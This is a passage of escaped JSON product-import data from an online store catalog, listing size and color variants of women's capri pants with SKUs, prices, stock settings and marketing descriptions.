set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Aeon Capri-29-Blue\",\"description\":\"<p>Reach for the stars and beyond in these Aeon Capri pant. With a soft, comfortable feel and moisture wicking fabric, these duo-tone leggings are easy to wear -- and wear attractively.<\\/p>\\n<p>&bull; Black capris with teal accents.<br \\/>&bull; Thick, 3\\\" flattering waistband.<br \\/>&bull; Media pocket on inner waistband.<br \\/>&bull; Dry wick finish for ultimate comfort and dryness.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aeon-capri-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp07-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp07-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp07-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp07-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp07-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1813\":{\"sku\":\"WP07-29-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Aeon Capri-29-Orange\",\"description\":\"<p>Reach for the stars and beyond in these Aeon Capri pant. With a soft, comfortable feel and moisture wicking fabric, these duo-tone leggings are easy to wear -- and wear attractively.<\\/p>\\n<p>&bull; Black capris with teal accents.<br \\/>&bull; Thick, 3\\\" flattering waistband.<br \\/>&bull; Media pocket on inner waistband.<br \\/>&bull; Dry wick finish for ultimate comfort and dryness.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aeon-capri-29-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp07-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp07-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp07-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp07-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp07-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Orange\"},\"1814\":{\"sku\":\"WP07\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Aeon Capri\",\"description\":\"<p>Reach for the stars and beyond in these Aeon Capri pant. With a soft, comfortable feel and moisture wicking fabric, these duo-tone leggings are easy to wear -- and wear attractively.<\\/p>\\n<p>&bull; Black capris with teal accents.<br \\/>&bull; Thick, 3\\\" flattering waistband.<br \\/>&bull; Media pocket on inner waistband.<br \\/>&bull; Dry wick finish for ultimate comfort and dryness.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Capri,material=CoolTech&trade;|Microfiber|Organic Cotton,pattern=Color-Blocked,climate=Indoor|Hot|Mild,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP07-28-Black,size=28,color=Black|sku=WP07-28-Blue,size=28,color=Blue|sku=WP07-28-Orange,size=28,color=Orange|sku=WP07-29-Black,size=29,color=Black|sku=WP07-29-Blue,size=29,color=Blue|sku=WP07-29-Orange,size=29,color=Orange\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp07-black_alt1.jpg,\\/w\\/p\\/wp07-black_back.jpg\",\"image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp07-black_alt1.jpg,\\/w\\/p\\/wp07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Capri\",\"material\":\"CoolTech&trade;|Microfiber|Organic Cotton\",\"pattern\":\"Color-Blocked\",\"climate\":\"Indoor|Hot|Mild\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1815\":{\"sku\":\"WP08-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Bardot Capri-28-Black\",\"description\":\"<p>Black is back &mdash; was it ever gone? &mdash; which means all your favorite tops will get along with the comfortable and versatile Bardot Capri.<\\/p>\\n<p>&bull; Black capris with pink waistband.<br \\/>&bull; Cropped leggings.<br \\/>&bull; Waistband drawcord. <br \\/>&bull; Flat, thin and flattering.<br \\/>&bull; Made with organic fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bardot-capri-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp08-black_back.jpg\",\"image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1816\":{\"sku\":\"WP08-28-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Bardot Capri-28-Green\",\"description\":\"<p>Black is back &mdash; was it ever gone? &mdash; which means all your favorite tops will get along with the comfortable and versatile Bardot Capri.<\\/p>\\n<p>&bull; Black capris with pink waistband.<br \\/>&bull; Cropped leggings.<br \\/>&bull; Waistband drawcord. <br \\/>&bull; Flat, thin and flattering.<br \\/>&bull; Made with organic fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bardot-capri-28-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Green\"},\"1817\":{\"sku\":\"WP08-28-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Bardot Capri-28-Red\",\"description\":\"<p>Black is back &mdash; was it ever gone? &mdash; which means all your favorite tops will get along with the comfortable and versatile Bardot Capri.<\\/p>\\n<p>&bull; Black capris with pink waistband.<br \\/>&bull; Cropped leggings.<br \\/>&bull; Waistband drawcord. <br \\/>&bull; Flat, thin and flattering.<br \\/>&bull; Made with organic fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bardot-capri-28-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Red\"},\"1818\":{\"sku\":\"WP08-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Bardot Capri-29-Black\",\"description\":\"<p>Black is back &mdash; was it ever gone? &mdash; which means all your favorite tops will get along with the comfortable and versatile Bardot Capri.<\\/p>\\n<p>&bull; Black capris with pink waistband.<br \\/>&bull; Cropped leggings.<br \\/>&bull; Waistband drawcord. <br \\/>&bull; Flat, thin and flattering.<br \\/>&bull; Made with organic fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bardot-capri-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp08-black_back.jpg\",\"image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1819\":{\"sku\":\"WP08-29-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Bardot Capri-29-Green\",\"description\":\"<p>Black is back &mdash; was it ever gone? &mdash; which means all your favorite tops will get along with the comfortable and versatile Bardot Capri.<\\/p>\\n<p>&bull; Black capris with pink waistband.<br \\/>&bull; Cropped leggings.<br \\/>&bull; Waistband drawcord. <br \\/>&bull; Flat, thin and flattering.<br \\/>&bull; Made with organic fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bardot-capri-29-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Green\"},\"1820\":{\"sku\":\"WP08-29-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Bardot Capri-29-Red\",\"description\":\"<p>Black is back &mdash; was it ever gone? &mdash; which means all your favorite tops will get along with the comfortable and versatile Bardot Capri.<\\/p>\\n<p>&bull; Black capris with pink waistband.<br \\/>&bull; Cropped leggings.<br \\/>&bull; Waistband drawcord. <br \\/>&bull; Flat, thin and flattering.<br \\/>&bull; Made with organic fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bardot-capri-29-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/